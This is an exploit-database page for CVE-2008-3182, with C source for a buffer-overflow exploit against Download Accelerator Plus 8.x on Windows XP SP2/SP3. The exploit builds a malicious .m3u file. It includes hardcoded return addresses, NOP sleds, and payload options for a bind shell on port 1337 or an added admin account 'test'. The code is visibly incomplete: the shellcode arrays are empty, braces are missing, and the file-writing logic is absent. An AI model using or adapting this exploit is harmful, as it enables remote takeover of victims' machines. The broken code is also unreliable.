Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow

Related Vulnerabilities: CVE-2008-3182  
Publish Date: 11 Jul 2008
Author: Shinnok

                #include <stdio.h>
#include <stdlib.h>
DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability 
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute 
arbitrary code in the context of the application.Failed exploit attempts 
will cause denial-of-service conditions.

Vulnerability discoverd by Krystian Kloskowski (h07) <>
Original POC by h07

This poc will create a "special" .m3u file that when imported in DAP and then checked with 
the verifiy button will cause a buffer overflow and  lead to exploitation.Run the program 
with no args for usage info or just look in the code. :P

Tested on Windows XP English sp2&sp3.

C Exploit code by Shinnok raydenxy [at] yahoo dot com

/* win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum */
unsigned char bind_scode[] =

/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum */
unsigned char user_scode[] =

unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll
unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll

unsigned char nops1[14115]; //14115 * \x90
unsigned char nops2[30]; //30 * \x90

int main(int argc, char **argv)
    int i;
    FILE* f;
    char* ra=NULL;
    char* scode=NULL;
    printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n");
	printf("[+] Discovered by Krystian Kloskowski (h07) <>\n");
	printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n");
    if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
            printf("Usage: %s target payload\n",argv[0]);
            printf("Where target is:\n");
            printf("0: WinXP SP2\n");
            printf("1: WinXP SP3\n");
            printf("Where payload is:\n");
            printf("0: bind shell on 1337\n");
            printf("1: add admin user \"test\" with password \"test\"\n");
            return EXIT_SUCCESS;
    for(i=0;i<14115;i++) nops1[i]='\x90';
    for(i=0;i<30;i++) nops2[i]='\x90';
    if(atoi(argv[1])==0) ra=ra_sp2;
    else ra=ra_sp3;
    if(atoi(argv[2])==0) scode=bind_scode;
    else scode=user_scode;
    printf("sploit.m3u created!\n");
    return EXIT_SUCCESS;

// [2008-07-11]